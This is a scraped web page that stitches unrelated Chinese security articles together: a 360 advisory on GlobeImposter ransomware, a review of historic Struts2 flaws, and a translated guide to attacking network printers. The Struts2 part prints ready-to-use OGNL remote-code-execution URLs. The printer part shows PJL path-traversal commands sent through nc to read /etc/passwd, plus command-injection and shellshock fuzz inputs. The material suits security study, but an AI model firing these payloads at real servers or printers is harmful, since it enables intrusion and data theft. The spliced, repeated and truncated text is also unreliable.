【招聘】加入VIPKID安全中心,一起守护希望的未来!
好未来教育集团招聘高级安全工程师
热门推荐
文章目录
公司简介
办公地点
招聘岗位
测试工程师(10k-20k)
机器学习工程师(10k-20k)
后端开发工程师(10k-20k)
安全工程师(10k-20k)
运维工程师(10k-20k)
产品经理(15k-30k)
人力资源经理(10k-20k)
员工福利
联系方式
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

360 勒索病毒

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
360威胁情报:GlobeImposter勒索病毒攻击事件分析
阅读量 197516 | 评论 9

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-08-23 11:00:10
360企业安全监测到,2018年8月21日起多地发生GlobeImposter勒索病毒事件,经过定性分析,攻击者在突破边界防御后利用黑客工具进行内网渗透并选择高价值目标服务器人工投放勒索病毒。此攻击团伙主要攻击开启远程桌面服务的服务器,利用密码抓取工具获取管理员密码后对内网服务器发起扫描并人工投放勒索病毒,导致文件被加密。病毒感染后的主要特征包括windows 服务器文件被加密、且加密文件的文件名后缀为*.RESERVE。根据本次事件特征分析,除已受到攻击的单位外,其它同类型单位也面临风险,需积极应对。
文档信息
文档名称 GlobeImposter勒索攻击事件安全预警通告第三次更新
关键字 勒索病毒GlobeImposter
发布日期 2018年2月26日
更新日期 2018年8月23日
分析团队 360安全监测与响应中心,360威胁情报中心,360安服团队、360天擎

事件信息
360企业安全监测到2018年8月21日起,多地发生GlobeImposter勒索病毒事件,经过定性分析,攻击者在突破边界防御后利用黑客工具进行内网渗透并选择高价值目标服务器人工投放勒索病毒。此攻击团伙主要攻击开启远程桌面服务的服务器,利用密码抓取工具获取管理员密码后对内网服务器发起扫描并人工投放勒索病毒,导致文件被加密。病毒感染后的主要特征包括windows 服务器文件被加密、且加密文件的文件名后缀为*.RESERVE。

360安全监测与响应中心、 360 威胁情报中心、360安服团队、360天擎对此事件进行了紧密跟踪与分析,认为本次事件不同于普通的勒索病毒事件。

勒索病毒之前的传播手段主要以钓鱼邮件、网页挂马、漏洞利用为主,例如Locky在高峰时期仅一家企业邮箱一天之内就遭受到上千万封勒索钓鱼邮件攻击。然而,从2016年下半年开始,随着Crysis/XTBL的出现,通过RDP弱口令暴力破解服务器密码人工投毒(常伴随共享文件夹感染)逐渐成为主角。到了2018年,几个影响力最大的勒索病毒几乎全都采用这种方式进行传播,这其中以GlobeImposter、Crysis为代表,感染用户数量最多,破坏性最强。360安全监测与响应中心在2018年8月16日发布的《GandCrab病毒勒索攻击安全预警通告》中涉及到的GandCrab病毒也是采用RDP弱口令暴力破解服务器密码人工投毒的方式进行勒索。

根据本次事件特征分析,除已受到攻击的单位外,其它同类型单位也面临风险,需积极应对。

黑客突破边界防御后,会以工具辅助手工的方式,对内网其他机器进行渗透。通过对多个现场的调查,黑客所使用的工具包括但不限于:

全功能远控木马
自动化添加管理员的脚本
内网共享扫描工具
Windows 密码抓取工具
网络嗅探、多协议暴破工具
浏览器密码查看工具
攻击者在打开内网突破口后,会在内网对其他主机进行口令暴破。在内网横向移动至一台新的主机后,会尝试进行包括但不限于以下操作:

手动或用工具卸载主机上安装的防护软件
下载或上传黑客工具包
手动启用远程控制以及勒索病毒

风险等级
360安全监测与响应中心风险评级为:高危

预警等级:蓝色预警(一般网络安全预警)

容易受攻击组织影响的机构
本次攻击者主要的突破边界手段可能为Windows远程桌面服务密码暴力破解,在进入内网后会进行多种方法获取登陆凭据并在内网横向传播。

综上,符合以下特征的机构将更容易遭到攻击者的侵害:

存在弱口令且Windows远程桌面服务(3389端口)暴露在互联网上的机构。
内网Windows终端、服务器使用相同或者少数几组口令。
Windows服务器、终端未部署或未及时更新安全加固和杀毒软件

处置建议
紧急解决方案
针对本次攻击事件,我们提供紧急解决方案如下:

一、紧急处置方案

1、对于已中招服务器

下线隔离。

2、对于未中招服务器

1)在网络边界防火墙上全局关闭3389端口或3389端口只对特定IP开放。

2)开启Windows防火墙,尽量关闭3389、445、139、135等不用的高危端口。

3)每台服务器设置唯一口令,且复杂度要求采用大小写字母、数字、特殊符号混合的组合结构,口令位数足够长(15位、两种组合以上)。

二、后续跟进方案

1)对于已下线隔离中招服务器,联系专业技术服务机构进行日志及样本分析。

服务器、终端防护
1. 所有服务器、终端应强行实施复杂密码策略,杜绝弱口令

2. 杜绝使用通用密码管理所有机器

3. 安装杀毒软件、终端安全管理软件并及时更新病毒库

4. 及时安装漏洞补丁

5. 服务器开启关键日志收集功能,为安全事件的追踪溯源提供基础

网络防护与安全监测
1. 对内网安全域进行合理划分。各个安全域之间限制严格的 ACL,限制横向移动的范围。

2. 重要业务系统及核心数据库应当设置独立的安全区域并做好区域边界的安全防御,严格限制重要区域的访问权限并关闭telnet、snmp等不必要、不安全的服务。

3. 在网络内架设 IDS/IPS 设备,及时发现、阻断内网的横向移动行为。

4. 在网络内架设全流量记录设备,以及发现内网的横向移动行为,并为追踪溯源提供良好的基础。

应用系统防护及数据备份
1. 应用系统层面,需要对应用系统进行安全渗透测试与加固,保障应用系统自身安全可控。

2. 对业务系统及数据进行及时备份,并验证备份系统及备份数据的可用性。

3. 建立安全灾备预案,一但核心系统遭受攻击,需要确保备份业务系统可以立即启用;同时,需要做好备份系统与主系统的安全隔离工作,辟免主系统和备份系统同时被攻击,影响业务连续性。

安全防护本身是一个动态的对抗过程,在以上安全加固措施的基础上,日常工作中,还需要加强系统使用过程的管理与网络安全状态的实时监测:

电脑中不使用不明来历的U盘、移动硬盘等存储设备;不接入公共网络,同时机构的内部网络中不运行不明来历的设备接入。

要常态化的开展安全检查和评估,及时发现安全薄弱环节,及时修补安全漏洞和安全管理机制上的不足,时刻保持系统的安全维持在一个相对较高的水平;(类似定期体检)

及时关注并跟进网络安全的技术进步,有条件的单位,可以采取新型的基于大数据的流量的监测设备并配合专业的分析服务,以便做到蠕虫病毒的第一时间发现、第一时间处置、第一时间溯源根除。

技术分析
勒索样本分析
1.样本初始化

勒索样本在运行后首先判断%LOCALAPPDATA%或%APPDATA%环境变量是否存在,如果存在则将自身复制到%LOCALAPPDATA%或%APPDATA%目录,之后将复制后的路径写入:HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\BrowserUpdateCheck 从而实现开机启动。

生成RSA私钥并使用硬编码公钥加密,之后将加密后的密文转换为ASCII码,最后将密文写入%ALLUSERSPROFILE% 变量路径中。

2.加密流程

初始化完成后开始进入加密流程,病毒会遍历全盘,在排除样本中不加密文件夹列表后,使用随机生成的公钥加密其他所有文件,之后将之前生成的机器唯一标识写入文件末尾。

排除的路径如下:

Windows

Microsoft

Microsoft Help

Windows App Certification Kit

Windows Defender

ESET

COMODO

Windows NT

Windows Kits

Windows Mail

Windows Media Player

Windows Multimedia PlatformWindows Phone Kits

Windows Phone Silverlight Kits

Windows Photo Viewer

Windows Portable Devices

Windows Sidebar

Windows PowerShell

NVIDIA Corporation

Microsoft .NET

Internet Explorer

Kaspersky Lab

McAfe

Avira

spytech software

sysconfig

Avast

DrWeb

Symantec

Symantec_Client_Security

system volume information

AVG

Microsoft Shared

Common Files

Outlook Express

Movie Maker

Chrome

Mozilla Firefox

Opera

YandexBrowser

ntldr

Wsus

ProgramData

时间线
[1] 2018年2月26日-360安全监测与响应中心发布预警通告

[2] 2018年2月27日-360安全监测与响应中心第二次发布预警通告

[3] 2018年8月23日-360安全监测与响应中心第三次发布预警通告

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/157562
安全客 – 有思想的安全新媒体
恶意软件 勒索软件 GlobeImposter

360威胁情报中心 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

Pwn FruitShop的故事(下)
2019-02-27 16:30:53

风雨欲来:恶意软件 Brushaloader 深入分析
2019-02-27 15:30:33

CVE-2018-0296 Cisco ASA 拒绝服务漏洞分析
2019-02-27 15:00:47

Video Downloader(Plus)Chrome插件漏洞分析:绕过CSP实现UXSS
2019-02-27 14:30:23
|发表评论
发表你的评论吧
昵称
杨教授
换一个
|评论列表
网瘾患者 · 2019-01-13 23:41:21 回复
数据库是可以恢复,其他文件不能,公众号“网安众安”有这个病毒解决办法

越南邻国宰相 · 2019-02-26 11:40:04 回复
没有啊

黑帽子 · 2018-12-24 16:06:06 回复
.rooster4444有没有得解决??

白帽子 · 2018-12-17 09:50:00 回复
Pig4444目前有解吗?

Helen · 2018-12-08 19:58:34 回复
我也中毒了,后缀名是Rabbit4444

带头大哥 · 2018-12-03 10:16:56 1 回复
我中毒加密文件后缀是horse4444,用这个软件分析出来是这个病毒。

Mickey牛 · 2018-12-17 10:16:39 回复
你的 解密完了吗

Mickey牛 · 2018-12-17 10:16:38 回复
你的 解密完了吗

杨教授 · 2018-12-06 09:28:10 回复
你的 解密完了吗

360威胁情报中心
这个人太懒了,签名都懒得写一个
文章
87
粉丝
27
TA的文章
盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15
1月政企终端安全态势分析报告
2019-02-18 15:19:45
疑似Molerats APT组织针对中东地区的最新攻击活动分析
2019-02-15 10:38:53
2018年全球十大APT攻击事件盘点
2019-02-08 10:07:13
全球高级持续性威胁2018年总结报告
2019-02-06 10:47:02
输入关键字搜索内容
相关文章
风雨欲来:恶意软件 Brushaloader 深入分析
watchdogs挖矿木马综合分析报告
事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
预警 | 部分云上用户中招 watchdogs 感染性挖矿病毒
Pony Loader窃密木马样本分析
盗号木马疯狂窃取游戏币,竟还利用搜索引擎打广告?
Lucky双平台勒索者解密分析
热门推荐
文章目录
文档信息
事件信息
风险等级
容易受攻击组织影响的机构
处置建议
紧急解决方案
服务器、终端防护
网络防护与安全监测
应用系统防护及数据备份
技术分析
勒索样本分析
时间线
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

struts2 漏洞

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【技术分享】浅谈struts2历史上的高危漏洞
阅读量 86385 | 稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-09-04 15:08:06
http://p1.qhimg.com/t01e0225f1ed0463bd6.jpg

作者:Carpediem

预估稿费:300RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

前言

Apache Struts2作为世界上最流行的Java Web框架之义,广泛应用于教育、金融、互联网、通信等重要行业。它的一个高危漏洞危害都有可能造成重大的互联网安全风险和巨大的经济损失。本文旨在对以往的高危漏洞形成原因、受影响的版本以及相应的利用方式进行一次梳理,若有不完善的地方欢迎大家指正。

先来介绍一些基本知识:Struts1是全世界第一个发布的MVC框架,Struts2实在webwork和Struts1的基础上开发的,Struts2和webwork底层都用到了xwork。并且整合了一种更为强大的表达式语言:ognl。基于Struts2框架开发项目的时候,需要引用一些基础的jar包,在Struts 2.0.*的时候,Struts2的必备jar包需要如下5个:

struts2-core-x.x.jar —————–struts2的核心包
Freemarker-x.x.jar———————FreeMarker是一个模板引擎,一个基于模板生成文本输出的通用工具
commons-logging.jar ——————通用日志记录包
ognl-x.x.jar ——————— ———支持ognl表达式
xwork-x.x.jar ——————— ——–xwork的包 由于Struts2是由xwork的延伸 有些类依然关联着 xwork的类
之后的版本的struts2可能还需要其他的jar包,比如commons-fileupload-1.2.1.jar 支持文件上传的jar包。

apache(http://struts.apache.org/docs/security-bulletins.html)历史上涉及的高危漏洞如下:S2-003,S2-005,S2-007,S2-008,S2-009,S2-012~S2-016,S2-019、S2-032、S2-033、S2-037、S2-045、S2-046、S2-048、DevMode。

一 S2-003、S2-005、S2-007

S2-003

受影响版本:低于Struts 2.0.12

Struts2会将HTTP的每个参数名解析为ognl语句执行(可理解为Java代码)。ognl表达式通过#来访问struts的对象,Struts框架通过过滤#字符防止安全问题,然后通过unicode编码(u0023)或8进制(43)即绕过了安全限制。

S2-005

受影响版本:低于Struts 2.2.1

对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,安全配置被绕过再次导致了漏洞。

EXP:

http://127.0.0.1:8080/struts2-showcase-2.1.6/showcase.action?%28%2743_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%2743context[%27xwork.MethodAccessor.denyMethodExecution%27]75false%27%29%28b%29%29&%28%2743c%27%29%28%28%2743_memberAccess.excludeProperties75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%2743mycmd75%27whoami%27%27%29%28d%29%29&%28h%29%28%28%2743myret75@java.lang.Runtime@getRuntime%28%29.exec%2843mycmd%29%27%29%28d%29%29&%28i%29%28%28%2743mydat75new40java.io.DataInputStream%2843myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%2743myres75new40byte[51020]%27%29%28d%29%29&%28k%29%28%28%2743mydat.readFully%2843myres%29%27%29%28d%29%29&%28l%29%28%28%2743mystr75new40java.lang.String%2843myres%29%27%29%28d%29%29&%28m%29%28%28%2743myout75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%2743myout.getWriter%28%29.println%2843mystr%29%27%29%28d%29%29
执行的“whoami”命令,将会直接写入到showcase.action文件中,并下载到本地。

S2-007

受影响版本:低于Struts 2.2.3.1

S2-007和S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞,导致黑客可以通过OGNL表达式实现代码注入和执行,所不同的是:

1. S2-003、S2-005: 通过OGNL的name-value的赋值解析过程、#访问全局静态变量(AOP思想)实现代码执行

2. S2-007: 通过OGNL中String向long转换过程实现代码执行

假设hello.java中定义了一个整数long id,id来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞,因此要想利用此漏洞,程序中必须有可以接受外界输入的id等参数。

EXP:

http://x.x.x.x/hello.action?id=’%2b(%23_memberAccess.allowStaticMethodAccess=true,%23context[“xwork.MethodAccessor.denyMethodExecution”]=false,%23cmd=”ifconfig”,%23ret=@java.lang.Runtime@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%23out=@org.apache.struts2.ServletActionContext@getResponse(),%23out.getWriter().println(%23echo))%2b’

二 S2-009

受影响版本:低于Struts 2.3.1.1

EXP:

http://127.0.0.1:8080/struts2-showcase-2.1.6/showcase.action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27mkdir%20/tmp/PWNAGE%27%29%29%28meh%29&z[%28foo%29%28%27meh%27%29]=true
将会在系统上建立/tmp/PWNAGE文件。

三 S2-012、S2-013

受影响版本:低于Struts 2.3.14.1

struts2中可以通过${express}或%{express}来引用ongl表达式,当配置一个action中有${input}或%{input}且input来自于外部输入时,给input赋值%{exp},从而导致任意代码执行。Struts2标签库中的url标签和a标签的includeParams这个属性,代表显示请求访问参数的含义,一旦它的值被赋予ALL或者GET或者 POST,就会显示具体请求参数内容,问题在于,struts竟然把参数做了OGNL解析。

x.jsp

Click here.
EXP:

http://x.x.x.x/x.jsp?a=1${(%23_memberAccess[“allowStaticMethodAccess”]=true,%23a=@java.lang.Runtime@getRuntime().exec(‘whoami’).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}

四 S2-016

受影响版本:低于Struts 2.3.15.1

在struts2中,DefaultActionMapper类支持以”action:”、”redirect:”、”redirectAction:”作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。

以“redirect”为例进行命令执行:

EXP1:

http://127.0.0.1:8080/struts2-showcase-2.1.6/showcase.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]%20{%27netstat%27,%27-an%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%20%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%20%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%20%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

五 S2-019

Struts 2.0.0 – Struts 2.3.15.1

Struts 2.3.15.2以后的版本默认关闭开发模式, 比较鸡肋。

Posted in 漏洞列表Leave a Comment on struts2 漏洞

网络打印机

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【技术分享】网络打印机安全技术初探
阅读量 54893 | 稿费 260

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-09-21 15:39:00
译文声明
本文是翻译文章,文章原作者,文章来源:0x00sec.org
原文地址:https://0x00sec.org/t/an-introduction-to-printer-exploitation-1/3565

译文仅供参考,具体内容表达以及含义原文为准

×
http://p2.qhimg.com/t01cf0b3af48aa5ede5.jpg

译者:blueSky

预估稿费:260RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

前言

以下章节的内容仅仅是我自己对打印机的研究工作以及最近读到的有关打印机文章的总结。在过去的几个月时间里,我有机会接触到几种不同型号的打印机,并学习了一些有关打印机的基本规范。不论是供应商还是基本规范,各个类型的打印机都不同,并且每个类型的打印机还使用各种不同的协议和固件。在接下来的文章中,我将先对打印机的有关理论知识进行介绍。

那么,为什么要将打印机作为攻击目标呢?为什么不像往常一样研究个人电脑或者服务器上的恶意软件呢?在接下来的几个段落中我们将对上述问题进行阐述。

本地vs网络打印机

本地打印机只是简单的连接到台式电脑上,共享性差。而现在的所有打印机基本上都是网络打印机,使用网络打印机可以使物理位置不在同一个地方的用户共享一个或者多个打印设备,整个视图看起来如下图所示:

http://p3.qhimg.com/t0165e88081d226a24f.png

如上图所示,网络打印机协议作为部署打印作业的通道,直接包含了页面描述语言(PDL)或者首先调用打印机或者作业控制语言!下面我将对上图中的每个部分进行介绍,并对每部分涉及到的基本原理进行阐述。

基础知识

一、固件

根据以往的工作经验,打印机使用了一些嵌入式设备的不同类型的操作系统。例如下面几个操作系统就是一些网络打印机常使用的嵌入式设备操作系统:

1. 可定制的GNU / Linux,

2. WindRiver Linux5,

3. VxWorks5,

4. ThreadX6。

通过对几款打印机的研究和分析,我总结出了这些打印机的一些共同点:

1. 精简指令/命令集-减少功能,

2. 使用版本较老的内核-通常内核版本是2.6.XYZ,

3. 可能包括一些“隐藏”功能,但可以通过wink补丁启用-例如:找到一个ssh文件,但需要在配置文件中启用,

4. 与家用打印机相比,ssh功能更多保留在办公室中的打印机中,

5. 有时固件的存储方式很有趣-例如:在SD卡上,您可以删除或者切换30秒内的物理访问。

以上的这些事实表明,网络打印机可能容易受到某些网络攻击,但这些网络攻击在实施上通常会变得比较“复杂”,因为网络攻击者甚至不能或以某种方式通过(远程)文件系统的写入来启用网络打印机上的某些功能。接下来,我将对打印机协议进行介绍,打印机协议通常用于打印服务器和台式PC之间的通信,甚至用于打印机内部的通信。

二、网络打印协议

在Windows用户群体中,SMB/CIFS协议的打印机很受欢迎。然而,最常见的网络打印协议是LPD,IPP和RAW。此外,一些网络设备还支持FTP或HTTP等通用协议通过文件上传的方式进行打印。

1. LPD

LPD是“行式打印机后台程序”协议的缩写,该协议监听TCP 515端口,可以通过CLI使用“lpr”进行访问。为了打印,客户端需要发送一个作业控制文件和包含要打印的数据文件。

2. IPP

IPP是基于HTTP的扩展协议,因此它继承了HTTP协议所有的安全功能,如基本身份验证和SSL/TLS加密。要提交打印作业,用户需要发送HTTP POST请求到IPP服务器,该服务器监听TCP 631端口,任何人都知道CUPS是IPP协议的一个实现,它是许多Linux发行版和macOS X中的默认打印系统。

3. SMB

SMB(服务器信息块)是应用层网络协议,通常在Windows上使用。该协议监听TCP 445端口,经常用于网络中的共享文件和打印机。

4. 9100端口

也被称为“raw printing”,因为它使用TCP 9100端口进行网络打印操作,通常在CUPS和Windows系统中使用。与LPD,IPP和SMB协议需要使用打印机控制语言才能执行打印操作相比,通过9100端口发送的所有数据都由打印设备直接处理,并直接将打印结果反馈到客户端,包括状态和错误消息。因此我们可以通过该方法来直接访问打印机控制语言的结果!

三、打印机控制语言

基本上,作业控制语言管理当前作业的输出等设置,它通常位于打印协议和页面描述语言之间。打印机控制和管理语言的设计不仅影响单个打印作业,而且影响整个打印设备。

下面我将对最基本的两个打印机控制语言进行介绍:

1. SNMP

SNMP-“简单网络管理协议”,该协议监听UDP 161端口,用于管理网络组件。

2. PJL

PJL是“Printer Job Language”的简称,该控制语言可用于操纵常规设置,也可以永久更改。在许多控制语言中,供应商往往只支持PJL控制语言中的部分命令,并根据打印机的需要自行添加专有的功能。此外,PJL也常用于设置实际打印数据的文件格式,网络攻击者往往对该控制语言的这个功能非常感兴趣。

四、页面描述语言(PDL)

PDL主要用于指定了实际文档的视图,下面将介绍两种主要的页面描述语言:

1. PostScript(PS)

众所周知,该页面描述语言由Adobe发明,并被广泛用于PDL。PS的能力远不止于定义文档的外观和处理矢量图形。因此,当被网络攻击者利用时,PS可以用于各种攻击,例如拒绝服务,打印作业处理和保留以及访问打印机的文件系统等恶意操作。

2. PCL

PCL是各种供应商和设备都支持的极简页面描述语言,该页面描述语言不直接访问底层文件系统,因此和PS相比,该描述语言并不是很适合用于攻击的目的。

漏洞利用

通过Shodan我发现很多人会把打印机放在因特网上,具体如下图所示:

http://p0.qhimg.com/t015fae523e6086029b.png

如上所述,很多网络打印机通过端口9100连接到互联网,因此网络攻击者使用该端口可以对这些网络打印机实施网络攻击。例如利用打印机设备上的一个SSH弱口令的漏洞就可以轻松的登入到网络打印机设备中去。

可能要搞的事情

1. DoS

独占传输通道-阻止一个打印端口,使打印机保持繁忙状态,不再打印任何东西。

文档处理-通过PDL操作文档,让打印机解析该文档。例如:PS中的无限循环。

物理损坏-在NVRAM芯片上写入的恶意软件。

2. 特权升级

恢复出厂设置-重置为出厂默认设置以绕过认证。

绕过账户权限。

3. 访问打印作业

尝试在打印机上查找存储的打印作业并提取它们。

更改打印作业。

4. 信息泄漏

内存访问-可能会找到密码或打印文档中的敏感数据。

文件系统访问-可以检索敏感信息,如配置文件或存储的打印作业。

凭证泄漏-对更改的默认登录凭据进行暴力攻击以获取访问权限

5. 代码执行

缓冲区溢出-由于打印机提供额外的语言和网络服务,因此可能存在缓冲区溢出漏洞;

固件更新-将打印机固件更新为含有恶意软件的固件;

软件包-定制和操纵打印机应用程序。

可能的攻击场景

如上所述,构造何种类型的攻击向量取决于攻击计划和访问方式,一些攻击手法可能需要物理访问,而另一些则可以通过远程来完成。例如,通过简单的打印作业(可能的情况:无需验证)发出恶意固件更新,提取敏感数据并使打印机不可用等。因此对打印机的攻击成败确实取决于它们所在的物理位置及其网络环境。

用到的工具

上面提到的很多技术需要掌握一些底层结构的知识(例如:使用PDL,PCL)。即使使用手册或在线搜索可以很容易地找到这些信息,但仍然是比较麻烦和额外的工作。因此利用现有的工具可以使我们的工作变得轻松和简单。

1. BeEF

浏览器开发框架(BeEx)是一种针对Web浏览器的渗透测试工具。它允许渗透测试者通过使用客户端攻击向量来评估目标环境的实际安全状态,使用该框架可以实现跨站打印。

2.Praeda

Praeda,是一款用Perl编写的自动打印机数据采集工具,该工具可以帮助渗透测试人员在安全评估工作期间收集可用的数据。Praeda能够从打印机的嵌入式Web服务器中收集敏感信息,包括设备密码,用户名以及电子邮件地址等敏感数据信息。

3. PRET15

这是一个用python编写的工具,该工具实现了我上述提到的每个攻击向量。

它通过网络或USB连接到网络打印机,并尝试利用打印机所使用的打印机语言,(目前支持的是PS,PJL和PCL),当成功连接时,有一大堆可以使用的命令。

4. LES

Linux Exploit Suggester是一个小perl脚本,由于嵌入式操作系统的内核版本通常远低于当前linux的桌面或服务器发行版本。那么使用该脚本在一些较旧版本的Linux内核漏洞利用中可能仍然可行!

下面我将通过一个实验性的例子来介绍如何对一台网络打印机实施网络攻击操作。

首先要明确打印机开放哪些端口以及操作系统指纹是什么,这里我们使用nmap来获取这些数据信息,扫描结果如下所示:

$ sudo nmap 192.168.1.108
Starting Nmap 7.01 ( https://nmap.org ) at 2017-09-11 20:13 CEST
Nmap scan report for 192.168.1.108
Host is up (0.031s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
515/tcp open printer
631/tcp open ipp
9100/tcp open jetdirect
MAC Address: 44:D2:44:1C:73:E2 (Seiko Epson)
Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds
Device type: specialized
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.31 – 2.6.35 (embedded)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
通过对扫描结果的分析我们发现,该打印机开放了9100端口,并且它正在运行一个较旧的Linux内核,但该打印机并没有开放TCP 22端口,因此想要造成文件系统的混乱是不可能的了。然后,使用PRET看看能获取到什么数据信息,实验结果如下所示:

$ python pret.py 192.168.1.108 -s PS
Checking for IPP support: found
Checking for HTTP support: found
Checking for SNMP support: found
Checking for PS support: not found
$ python pret.py 192.168.1.108 -s Pjl
Checking for IPP support: found
Checking for HTTP support: found
Checking for SNMP support: found
Checking for PJL support: not found
$ python pret.py 192.168.1.108 -s PCL
Checking for IPP support: found
Checking for HTTP support: found
Checking for SNMP support: found
Checking for PCL support: not found
依然没有发现SSH,很可能是这款打印机的供应商对该打印机系统做了一些定制化的操作,使其变得稍微安全一些,不然一旦使用PRET连接到打印机中的一个功能,我们将可以做很多事情。例如检查文件系统。 创建目录,更改配置文件甚至dump整个NVRAM。在发现使用PRET无果之后,我继续尝试其他渗透测试工具!我准备使用LES工具,以发现是否存在可以利用的Linux漏洞,实验过程如下所示:

$ perl Linux_Exploit_Suggester.pl -k 2.6.31
Kernel local: 2.6.31
Searching among 65 exploits…
Possible Exploits:
[+] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408/
[+] can_bcm
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814/
[+] do_pages_move
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[+] half_nelson
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/6851
[+] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787/
[+] msr
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297/
[+] pipe.c_32bit
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[+] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150/
[+] ptrace_kmod2
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023/
[+] rawmodePTY
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[+] rds
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285/
[+] reiserfs
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130/
[+] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024/
通过简单地分析LES工具的输出结果,我决定继续尝试其他方法。

直觉告诉我,为什么不再试试PJL呢?因此我使用netcat作为监听程序,并尝试手动调用一些命令,执行命令如下所示:

echo “@PJL FSUPLOAD FORMAT:BINARY NAME=”../../etc/passwd” OFFSET=0 SIZE=648″ | nc -v -v 192.168.1.108 9100
# If successful this should display the */etc/passwd* file.
或者

echo “@PJL INFO ID” | nc -v -v 192.168.1.108 9100
# If successful this should get the *printer’s device information*
在这个过程中我也尝试了其他PJL命令注入技术,由于它们的命令语法差异很大,加上我也不太了解PS/PCL的启动,因此我的打印机对这种“攻击”一点也没有反应。

一个PRET脚本就能搞定?

如上所述,PRET并不能用来“攻击”我的家用打印机。但是我发现PRET源文件夹中有一个名为“lpdtest.py”的“隐藏”脚本,该脚本可以用来测试行式打印机后台程序中较老的漏洞,测试过程如下所示:

尝试从打印机的文件系统获取文件,代码如下所示:

$ lpdtest.py printer get / etc / passwd
$ lpdtest.py printer get ../../../etc/passwd
#etc…
此测试对用户输入的数据(例如主机名,用户名,作业名,文件名等)进行fuzz处理。

# Test for environment variables
$ lpdtest.py printer in ‘$UID’
# Test for pipes and redirects
$ lpdtest.py printer in ‘| pwd’
$ lpdtest.py printer in ‘>> /etc/passwd’
# Test for backticks
$ lpdtest.py printer in ‘`ls`’
# Test for [shellshock (CVE-2014-6271)](http://seclists.org/oss-sec/2014/q3/650)
$ lpdtest.py printer in ‘() {:;}; /bin/ping -c1 1.2.3.4’
正如预期的那样,这些攻击已经被修复,使用该脚本依然没能成功实施对打印机的攻击操作。

总结

